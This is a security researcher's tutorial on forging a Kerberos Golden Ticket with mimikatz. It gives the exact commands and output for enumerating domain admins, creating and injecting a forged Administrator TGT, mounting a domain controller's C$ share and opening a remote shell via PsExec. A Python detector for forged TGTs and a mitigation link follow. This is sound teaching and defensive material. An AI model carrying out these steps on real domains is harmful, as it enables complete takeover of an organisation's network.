Obtaining a Golden Ticket with mimikatz
Introduction
We have a new feature again in mimikatz called Golden Ticket provided by Benjamin Delpy aka gentilkiwi. With this technique, we can basically access any resource in the domain.
mimikatz provides the Golden Ticket feature; with this technique we can access any resource in the domain.
Here is the list of the four things you need to make it work:
- krbtgt user's NTLM hash (e.g. from a previous NTDS.DIT dump)
- Domain name
- Domain's SID
- Username that we'd like to impersonate
As you can see, exploiting this architectural flaw is not trivial, because we need the NTLM hash of the krbtgt user and that requires hacking a Domain Controller first. But once that is done we can play with it for some time, because the hash of the krbtgt user will not change for a while.
As you know, mimikatz can dump and replay the existing tickets on Windows, so when we get access to a server or workstation and dump the tickets, we can easily replay those on another computer and get access to the same resource. See Google for more info.
Attack
When we have everything from the list above, we can create a new TGT ticket with mimikatz and grant access to anything in the domain. Let's see an example:
First we look for a domain administrator:

C:\Users\evilhacker>net group "domain admins" /domain
The request will be processed at a domain controller for domain ctu.domain.

Group name     Domain Admins
Comment        Designated administrators of the domain

Members

-------------------------------------------------------------------------------
Administrator            schema.Admin             Jack.Bauer

Administrator is good for us, so we create a TGT ticket with the Kerberos user's hashed password and make it look as if Administrator asked for access to a share. Now let's get the Domain SID. The easiest way to do that is just to use "whoami /user" and remove the last part of the SID, or if we have PsTools then PsGetsid.exe comes in handy:
C:\Users\evilhacker\Documents\mimikatz>PsGetsid.exe CTU.DOMAIN

PsGetSid v1.44 - Translates SIDs to names and vice versa
Copyright (C) 1999-2008 Mark Russinovich
Sysinternals - www.sysinternals.com

SID for CTU.DOMAIN\CTU.DOMAIN:
S-1-1-12-123456789-1234567890-123456789

(This gives the domain SID; alternatively, run whoami /user to get your own user's SID and remove everything after the last "-".)
Now we have everything to start the attack. First we list the existing Kerberos tickets; if there are any, we can remove them with the purge command (but it is not necessary), and then we can create the Golden Ticket and pass it.
C:\Users\evilhacker\Documents\mimikatz>mimikatz.exe

  .#####.   mimikatz 2.0 alpha (x86) release "Kiwi en C" (Jan 21 2014 15:06:17)
 .## ^ ##.
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'                                     with 14 modules * * */

mimikatz # kerberos::list

[00000000] - 17
   Start/End/MaxRenew: 1/24/2014 12:46:49 PM ; 1/24/2014 9:23:28 PM ; 1/31/2014 11:23:28 AM
   Server Name       : krbtgt/CTU.DOMAIN @ CTU.DOMAIN
   Client Name       : evilhacker @ CTU.DOMAIN
   Flags 60a00000    : pre_authent ; renewable ; forwarded ; forwardable ;
...

mimikatz # kerberos::purge
Ticket(s) purge for current session is OK

Generate the ticket:

mimikatz # kerberos::golden /admin:Administrator /domain:CTU.DOMAIN /sid:S-1-1-12-123456789-1234567890-123456789 /krbtgt:deadbeefboobbabe003133700009999 /ticket:Administrator.kiribi
Admin  : Administrator
Domain : CTU.DOMAIN
SID    : S-1-1-12-123456789-1234567890-123456789
krbtgt : deadbeefboobbabe003133700009999
Ticket : Administrator.kiribi
 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated

Final Ticket Saved to file !

Import the ticket:

mimikatz # kerberos::ptt Administrator.kiribi
Ticket 'Administrator.kiribi' successfully submitted for current session

mimikatz # kerberos::list

[00000000] - 17
   Start/End/MaxRenew: 1/24/2014 12:52:13 PM ; 1/24/2024 12:52:13 PM ; 1/24/2034 12:52:13 PM
   Server Name       : krbtgt/CTU.DOMAIN @ CTU.DOMAIN
   Client Name       : Administrator @ CTU.DOMAIN
   Flags 40e00000    : pre_authent ; initial ; renewable ; forwardable ;

mimikatz # kerberos::tgt
Keberos TGT of current session :
   Start/End/MaxRenew: 1/24/2014 12:52:13 PM ; 1/24/2024 12:52:13 PM ; 1/24/2034 12:52:13 PM
   Service Name (02) : krbtgt ; CTU.DOMAIN; @ CTU.DOMAIN
   Target Name  (--) : @ CTU.DOMAIN
   Client Name  (01) : Administrator ; @ CTU.DOMAIN
   Flags 40e00000    : pre_authent ; initial ; renewable ; forwardable ;
   Session Key  (17) : 5b 1a f2 fb f2 4d 2c 70 9c 3f 36 80 82 0c 23 37
   Ticket       (00 - 17) : [...]
(A NULL session key means allowtgtsessionkey is not set to 1.) Now you can mount any share or use any RPC-related tool that you like.

Try accessing a resource in the domain:

C:\Users\evilhacker\Documents\mimikatz>net use i: \\dc01.ctu.domain\c$
The command completed successfully.

C:\Users\evilhacker\Documents\mimikatz>net use
New connections will be remembered.

Status       Local     Remote                    Network
-------------------------------------------------------------------------------
OK           I:        \\dc01.ctu.domain\c$      Microsoft Windows Network
The command completed successfully.
OR
Run cmd remotely:

C:\Users\evilhacker\Documents\pstools>PsExec.exe \\dc01.ctu.domain\ cmd.exe

PsExec v2.0 - Execute processes remotely
Copyright (C) 2001-2013 Mark Russinovich
Sysinternals - www.sysinternals.com

Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>hostname
DC01

C:\Windows\system32>exit
cmd.exe exited on dc01.ctu.domain\ with error code 0.
Some additional notes:
- A password change on behalf of the user does not have any impact on the ticket; the access can be granted without the user's password (or hash)
- Mimikatz does not support users other than a Domain Admin (it is hardcoded in the source); by the way, I managed to impersonate a domain controller, with some malfunctions.
- The TGT ticket is issued for 10 years and can be renewed for 10 more years
- Existing sessions cannot be overridden. Already attached shares have to be detached first and reattached again.
- Cached tickets sometimes cannot be purged, so the computer has to be restarted (for example, if there is a group policy that attaches different shares, then those shares cannot be mounted as the impersonated user)
- Mimikatz does not require SE_DEBUG or any other privilege to create and pass a TGT
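The two kerberos::list listings above are also what a defender gets to see on a compromised host, and they carry two tell-tale signs: a TGT that lives for 10 years and is renewable for 20 (a normally issued one lives hours), and a Client Name (Administrator) that no longer matches the account owning the logon session (evilhacker). The following Python is an added example, not part of the original article and not mimikatz code, that parses listings in this format and reports such TGTs. The sample listings are constructed from the output shown on this page; the 10-hour and 7-day limits are assumptions matching Active Directory defaults and should be aligned with your domain's Kerberos policy.

```python
"""Flag forged-looking TGTs in a mimikatz kerberos::list style listing.

Added example for this article; the heuristics come from the listings on the
page (10-year lifetime, client name != logon session owner), the policy limits
are assumptions.
"""
import re
from datetime import datetime, timedelta

# Constructed samples: the two kerberos::list outputs shown on the page.
BEFORE_PTT = """\
[00000000] - 17
   Start/End/MaxRenew: 1/24/2014 12:46:49 PM ; 1/24/2014 9:23:28 PM ; 1/31/2014 11:23:28 AM
   Server Name       : krbtgt/CTU.DOMAIN @ CTU.DOMAIN
   Client Name       : evilhacker @ CTU.DOMAIN
   Flags 60a00000    : pre_authent ; renewable ; forwarded ; forwardable ;
"""
AFTER_PTT = """\
[00000000] - 17
   Start/End/MaxRenew: 1/24/2014 12:52:13 PM ; 1/24/2024 12:52:13 PM ; 1/24/2034 12:52:13 PM
   Server Name       : krbtgt/CTU.DOMAIN @ CTU.DOMAIN
   Client Name       : Administrator @ CTU.DOMAIN
   Flags 40e00000    : pre_authent ; initial ; renewable ; forwardable ;
"""

TIME_FMT = "%m/%d/%Y %I:%M:%S %p"          # format used in the listing
# Assumed policy limits (Active Directory defaults: 10 h ticket, 7 d renewal).
MAX_TICKET_LIFE = timedelta(hours=10)
MAX_RENEW_LIFE = timedelta(days=7)

TIMES_RE = re.compile(r"Start/End/MaxRenew:\s*(.+?)\s*;\s*(.+?)\s*;\s*(.+)")
FIELD_RE = re.compile(r"^\s*(Server Name|Client Name)\s*:\s*(.+?)\s*$", re.M)


def parse_tickets(listing):
    """Split a listing into one dict per [NNNNNNNN] entry."""
    tickets = []
    for chunk in re.split(r"^\[\d{8}\]", listing, flags=re.M):
        m = TIMES_RE.search(chunk)
        if not m:
            continue  # leading empty chunk or an entry without times
        start, end, renew = (datetime.strptime(t.strip(), TIME_FMT) for t in m.groups())
        fields = dict(FIELD_RE.findall(chunk))
        tickets.append({
            "start": start, "end": end, "renew": renew,
            "server": fields.get("Server Name", ""),
            "client": fields.get("Client Name", ""),
        })
    return tickets


def check_tgt(ticket, session_user):
    """Return the reasons this TGT looks forged; an empty list means nothing odd."""
    reasons = []
    if not ticket["server"].lower().startswith("krbtgt/"):
        return reasons  # service tickets are not judged here
    life = ticket["end"] - ticket["start"]
    renew = ticket["renew"] - ticket["start"]
    if life > MAX_TICKET_LIFE:
        reasons.append("ticket lifetime %s exceeds policy %s" % (life, MAX_TICKET_LIFE))
    if renew > MAX_RENEW_LIFE:
        reasons.append("renewable lifetime %s exceeds policy %s" % (renew, MAX_RENEW_LIFE))
    client_user = ticket["client"].split("@")[0].strip()
    if client_user.lower() != session_user.lower():
        reasons.append("client name %r differs from session owner %r" % (client_user, session_user))
    return reasons


def suspicious_tgts(listing, session_user):
    """(client name, reasons) for every TGT in the listing that has at least one reason."""
    result = []
    for ticket in parse_tickets(listing):
        reasons = check_tgt(ticket, session_user)
        if reasons:
            result.append((ticket["client"], reasons))
    return result


if __name__ == "__main__":
    # The session owner is the account the listing was collected under.
    for label, listing in (("before ptt", BEFORE_PTT), ("after ptt", AFTER_PTT)):
        print(label, "->", suspicious_tgts(listing, "evilhacker") or "no anomalies")
```

Fed the first listing, the checker reports nothing; fed the listing taken after kerberos::ptt it reports all three anomalies for the Administrator TGT. The same logic applies to klist output collected by an EDR agent once it is reshaped into these fields.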
Mitigation
A good mitigation how-to from CERT-EU: Protection from Kerberos Golden Ticket
Greetings
Thanks to Kristof Feiszt for support, Benjamin `gentilkiwi` Delpy for mimikatz ;)
Author
Balazs Bucsay - mimikatz[!at!]rycon[!dot!]hu - http://rycon.hu/ - 2014. 01. 24.